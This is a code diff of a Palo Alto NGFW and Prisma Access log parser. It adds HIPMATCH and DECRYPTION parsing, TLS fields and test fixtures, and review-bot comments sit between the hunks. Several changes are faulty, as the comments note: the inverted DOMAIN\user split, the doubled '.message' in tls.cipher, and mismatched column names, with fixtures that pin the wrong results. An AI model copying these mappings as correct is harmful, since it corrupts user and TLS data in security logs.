@@ -0,0 +1,73 @@ +{ + "input": { + "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T17:50:04.310000Z", + "action": { + "type": "0" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-CIV1", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-CIV1", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "28", + "DGHierarchyLevel2": "99", + "DGHierarchyLevel3": "38", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json new file mode 100644 index 000000000..b0b294778 --- /dev/null 
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json 
@@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN 
Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:30:28Z", + "action": { + "type": "hipmatch" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-ALK01", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-ALK01", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "22", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "hipmatch", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe", + "jdoe@example.org" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe@example.org" + } + }, + "user": { + "domain": "example.org", + "email": "jdoe@example.org", + "name": "jdoe" + } + } +} \ No newline at end of file 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json index 25db7ff0a..c0622d09c 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json @@ -25,6 +25,7 @@ "type": "globalprotect" }, "host": { + "id": "e4f14dfd-bd3c-40e5-9c4e", "name": "LNL-test" }, "log": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json new file mode 100644 index 000000000..b4429340a --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json 
@@ -0,0 +1,74 @@ +{ + "input": { + "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00", + "event": { + "category": [ + "authentication" + ], + "dataset": "system", + "reason": "When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. 
Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-26T21:10:01.627000Z", + "action": { + "name": "auth-success", + "type": "auth" + }, + "destination": { + "address": "1.7.4.2", + "ip": "1.7.4.2" + }, + "log": { + "hostname": "FWPAN00", + "level": "informational", + "logger": "system" + }, + "observer": { + "name": "FWPAN00", + "product": "PAN-OS", + "serial_number": "02410100000000" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "auth-success", + "Threat_ContentType": "auth", + "authetification": { + "profile": "FWPA" + }, + "server": { + "profile": "RADIUS_RSA" + }, + "vsys": "shared" + }, + "related": { + "ip": [ + "1.2.5.5", + "1.7.4.2" + ], + "user": [ + "test000555" + ] + }, + "source": { + "address": "1.2.5.5", + "ip": "1.2.5.5" + }, + "user": { + "name": "test000555" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json index edd76521b..4962d00cc 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json @@ -82,7 +82,7 @@ "8.7.6.5" ], "user": [ - "example.org", + "john.doe", "john.doe@example.org" ] }, @@ -103,9 +103,9 @@ } }, "user": { - "domain": "john.doe", + "domain": "example.org", "email": "john.doe@example.org", - "name": "example.org" + "name": "john.doe" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml index 6382be28b..3b3fd8fc6 100644 --- a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml +++ b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml 
@@ -297,3 +297,18 @@ paloalto.threat.name:
 description: The name of the threat
 name: paloalto.threat.name
 type: keyword
+
+paloalto.tls.chain_status:
+ description: The trust in the TLS chain
+ name: paloalto.tls.chain_status
+ type: keyword
+
+paloalto.tls.root_status:
+ description: The trust in the root certificate
+ name: paloalto.tls.root_status
+ type: keyword
+
+paloalto.tls.sni:
+ description: The server name indication
+ name: paloalto.tls.sni
+ type: keyword
diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
index 113ef7fdb..d212c5fcc 100644
--- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
@@ -142,7 +142,7 @@ pipeline:
 input_field: original.message
 output_field: message
 columnnames:
- - FUTURE_USER
+ - PaloAltoDomain
 - ReceiveTime
 - DeviceSN
 - Type
@@ -187,12 +187,12 @@ pipeline:
 input_field: original.message
 output_field: message
 columnnames:
- - FUTURE_USE
+ - PaloAltoDomain
 - ReceiveTime
 - DeviceSN
 - Type
 - Subtype
- - FUTURE_USE
+ - ConfigVersion
 - GeneratedTime
 - VirtualLocation
 - EventID
@@ -235,12 +235,12 @@ pipeline:
 input_field: original.message
 output_field: message
 columnnames:
- - FUTURE_USE
+ - PaloAltoDomain
 - ReceiveTime
 - DeviceSN
 - Type
 - Subtype
- - FUTURE_USE
+ - ConfigVersion
 - GeneratedTime
 - VirtualLocation
 - EventID
@@ -382,6 +382,167 @@ pipeline:
 - HighResolutionTimestamp
 delimiter: ","
+ # HIPMATCH CSV
+ - name: parsed_event
+ filter: "{{parsed_dsv.message.Type == 'HIPMATCH'}}"
+ external:
+ name: dsv.parse-dsv
+ properties:
+ input_field: original.message
+ output_field: message
+ columnnames:
+ - PaloAltoDomain
+ - ReceiveTime
+ - DeviceSN
+ - Type
+ - Subtype
+ - ConfigVersion
+ - GenerateTime
+ - SourceUser
+ - VirtualLocation
+ - MachineName
+ - EndpointOSType
+ - SourceAddress
+ - HipMatchName
+ - RepeatCount
+ - HIPMatchType
+ - FUTURE_USE
+ - FUTURE_USE
+ - SequenceNumber
+ - ActionFlags
+ - DGHierarchyLevel1
+ - DGHierarchyLevel2
+ - DGHierarchyLevel3
+ - DGHierarchyLevel4
+ - VirtualSystemName
+ - DeviceName
+ - VirtualSystemID
+ - SourceIPv6
+ - HostID
+ - EndpointSerialNumber
+ - SourceDeviceMac
+ - HighResolutionTimestamp
+ - ClusterName
+ delimiter: ","
+
+ # DECRYPTION CSV
+ - name: parsed_event
+ filter: "{{parsed_dsv.message.Type == 'DECRYPTION'}}"
+ external:
+ name: dsv.parse-dsv
+ properties:
+ input_field: original.message
+ output_field: message
+ columnnames:
+ - PaloAltoDomain
+ - ReceiveTime
+ - DeviceSN
+ - Type
+ - Subtype
+ - ConfigVersion
+ - GenerateTime
+ - SourceAddress
+ - DestinationAddress
+ - NATSourceIP
+ - NATDestinationIP
+ - Rule
+ - SourceUser
+ - DestinationUser
+ - Application
+ - VirtualLocation
+ - SourceZone
+ - DestinationZone
+ - InboundInterface
+ - OutboundInterface
+ - LogAction
+ - TimeLogged
+ - SessionID
+ - RepeatCount
+ - SourcePort
+ - DestinationPort
+ - NATSourcePort
+ - NATDestinationPort
+ - Flags
+ - IPProtocol
+ - Action
+ - Tunnel
+ - FUTURE_USE
+ - FUTURE_USE
+ - SourceVMUUID
+ - DestinationVMUUID
+ - UUIDforrule
+ - StageforClienttoFirewall
+ - StageforFirewalltoServer
+ - TLSVersion
+ - TLSKeyExchange
+ - TLSEncryptionAlgorithm
+ - TLS_AUTH
+ - PolicyName
+ - EllipticCurve
+ - ErrorIndex
+ - RootStatus
+ - ChainStatus
+ - ProxyType
+ - CertificateSerialNumber
+ - Fingerprint
+ - CertificateStartDate
+ - CertificateEndDate
+ - CertificateVersion
+ - CertificateSize
+ - CommonNameLength
+ - IssuerCommonNameLength
+ - RootCommonNameLength
+ - SNILength
+ - CertificateFlags
+ - SubjectCommonName
+ - IssuerSubjectCommonName
+ - RootSubjectCommonName
+ - ServerNameIndication
+ - Error
+ - ContainerID
+ - PODNamespace
+ - PODName
+ - SourceExternalDynamicList
+ - DestinationExternalDynamicList
+ - SourceDynamicAddressGroup
+ - DestinationDynamicAddressGroup
+ - HighResTimestamp
+ - SourceDeviceCategory
+ - SourceDeviceProfile
+ - SourceDeviceModel
+ - SourceDeviceVendor
+ - SourceDeviceOSFamily
+ - SourceDeviceOSVersion
+ - SourceHostname
+ - SourceMACAddress
+ - DestinationDeviceCategory
+ - DestinationDeviceProfile
+ - DestinationDeviceModel
+ - DestinationDeviceVendor
+ - DestinationDeviceOSFamily
+ - DestinationDeviceOSVersion
+ - DestinationHostname
+ - DestinationMACAddress
+ - SequenceNumber
+ - ActionFlags
+ - DGHierarchyLevel1
+ - DGHierarchyLevel2
+ - DGHierarchyLevel3
+ - DGHierarchyLevel4
+ - VirtualSystemName
+ - DeviceName
+ - VirtualSystemID
+ - ApplicationSubcategory
+ - ApplicationCategory
+ - ApplicationTechnology
+ - ApplicationRisk
+ - ApplicationCharacteristic
+ - ApplicationContainer
+ - ApplicationSaaS
+ - ApplicationSanctionedState
+ - ClusterName
+ delimiter: ","
+
 - name: parsed_timestamp
 external:
 name: date.parse
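Review bot: Two of the new DECRYPTION column names do not match the keys the later set stages read, so the parsed values are silently dropped: the zones are named `SourceZone`/`DestinationZone` while `observer.ingress.interface.alias`/`observer.egress.interface.alias` read `FromZone`/`ToZone`, and the rule UUID is named `UUIDforrule` while `rule.uuid` reads `PanOSRuleUUID or RuleUUID`. The new test_decryption_csv.json fixture pins exactly that loss — no observer zones and no rule.uuid although the input message carries both — so it will not catch the mismatch. Renaming the three columns to `FromZone`, `ToZone` and `RuleUUID`, the names the JSON dialect already uses, fixes both without touching the set stages, which live in the later hunks of this file.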
@@ -577,7 +738,7 @@ stages:
 event.module: "{{parsed_description.message.module}}"
 host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}"
 host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost}}"
- host.id: "{{parsed_event.message.deviceExternalId}}"
+ host.id: "{{parsed_event.message.deviceExternalId or parsed_event.message.HostID}}"
 host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}"
 host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}"
 host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}"
@@ -593,6 +754,13 @@ stages:
 network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}"
 network.protocol: "{{parsed_description.message.proto}}"
 network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}"
+ tls.version: "{{parsed_event.message.TLSVersion[3:]}}"
+ tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.message.TLS_AUTH}}"
+ tls.curve: "{{parsed_event.message.EllipticCurve}}"
+ tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName}}"
+ tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName}}"
+ tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber}}"
+ tls.server.hash.sha256: "{{parsed_event.message.Fingerprint}}"
 observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}"
 observer.ingress.interface.alias: "{{parsed_event.message.FromZone or parsed_event.message.cs4}}"
 observer.ingress.interface.name: "{{parsed_description.message.intf}}"
@@ -602,7 +770,7 @@ stages:
 observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}"
 observer.serial_number: "{{parsed_event.message.DeviceSN}}"
 observer.name: "{{parsed_event.message.DeviceName}}"
- rule.name: "{{parsed_event.message.Rule}}"
+ rule.name: "{{parsed_event.message.Rule or parsed_event.message.HipMatchName}}"
 rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}"
 source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}"
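Review bot: The `tls.cipher` template reads `parsed_event.message.message.TLS_AUTH` — a doubled `.message` — so the third component never resolves and the field is absent from both new decryption fixtures (test_decryption_csv.json and test_decryption_json.json), which therefore pin the bug instead of catching it. It should read `TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.TLS_AUTH or parsed_event.message.TLSAuth}}`, since the JSON input names the field `TLSAuth`. The other x509 keys are likewise single-dialect: `SubjectCommonName` and `CertificateSerialNumber` exist only in the CSV column list while the JSON event carries `CommonName` and `CertificateSerial`, and `IssuerCommonName` exists only in JSON while the CSV column is `IssuerSubjectCommonName`, so each dialect loses part of the certificate metadata. Once the cipher template resolves, check that events without TLS fields (the hipmatch fixtures) do not emit a degenerate `TLS___` value; a filter on `TLSKeyExchange` may be needed.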
@@ -766,6 +934,9 @@ stages:
 paloalto.endpoint.serial_number: "{{parsed_event.message.EndpointSerialNumber or parsed_event.message.PanOSEndpointSerialNumber}}"
 paloalto.threat.id: "{{parsed_event.message.ThreatID or parsed_event.message.PanOSThreatID or parsed_threat.message.threat_code}}"
 paloalto.threat.name: "{{parsed_threat.message.threat_description}}"
+ paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus}}"
+ paloalto.tls.root_status: "{{parsed_event.message.RootStatus}}"
+ paloalto.tls.sni: "{{parsed_event.message.ServerNameIndication}}"
 - set:
 source.user.name: "{{parsed_event.message.SourceUser}}"
 user.name: "{{parsed_event.message.SourceUser}}"
@@ -798,8 +969,8 @@ stages:
 set_finalize_user_name:
 actions:
 - set:
- user.domain: '{{final.user.name.split("\\") | first}}'
- user.name: '{{final.user.name.split("\\") | last}}'
+ user.domain: '{{final.user.name.split("\\") | last}}'
+ user.name: '{{final.user.name.split("\\") | first}}'
 filter: '{{final.user.name != null and "\\" in final.user.name}}'
 - set:
 user.domain: '{{final.user.email.split("@") | first}}'
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json
index 1a4fba4b4..b32ea4d13 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json
@@ -69,6 +69,7 @@
 "1.1.1.1"
 ],
 "user": [
+ "paloaltonetwork",
 "xxxxx"
 ]
 },
@@ -90,8 +91,8 @@
 }
 },
 "user": {
- "domain": "paloaltonetwork",
- "name": "xxxxx"
+ "domain": "xxxxx",
+ "name": "paloaltonetwork"
 }
 }
 }
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json
index 512ae89e7..37c8000b9 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json
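Review bot: The swap in set_finalize_user_name inverts the backslash split: for a `DOMAIN\user` value `first` is the domain and `last` is the user name, so the new lines assign the user name to user.domain and the domain to user.name. The regenerated fixtures show the regression — fix_bug_with_int.json now expects `"domain": "pusername", "name": "domain"` and globalprotect_csv_2.json `"domain": "test", "name": "example.org"` — and the domain part now also leaks into related.user, assuming those inputs are of the form `domain\pusername` (their input blocks are outside this diff). The stanza that needed the fix is the email branch on the last context line, where `user.domain` takes `first` of `split("@")`, i.e. the local part; its `user.name` line lies outside the hunk. Restore the two original backslash lines and change the email branch to `user.domain: '{{final.user.email.split("@") | last}}'` with `user.name` taking `| first`.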
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json @@ -62,6 +62,7 @@ "5.6.7.8" ], "user": [ + "domain", "pusername", "userdest" ] @@ -86,8 +87,8 @@ } }, "user": { - "domain": "domain", - "name": "pusername" + "domain": "pusername", + "name": "domain" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json index 65f2b6940..127226ee3 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee", "name": "AAAABBBBB", "os": { "version": "Microsoft Windows 10 Pro , 64-bit" diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json index e4b1d5fab..e51f19fbb 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3", "name": "2021-02707", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" @@ -46,6 +47,7 @@ "88.120.236.74" ], "user": [ + "example.org", "test" ] }, @@ -61,8 +63,8 @@ } }, "user": { - "domain": "example.org", - "name": "test" + "domain": "test", + "name": "example.org" }, "user_agent": { "os": { diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json new file mode 100644 index 000000000..8a060536e --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json 
@@ -0,0 +1,98 @@ +{ + "input": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": 
"5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json new file mode 100644 index 000000000..35fa4abec --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json 
@@ -0,0 +1,119 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome 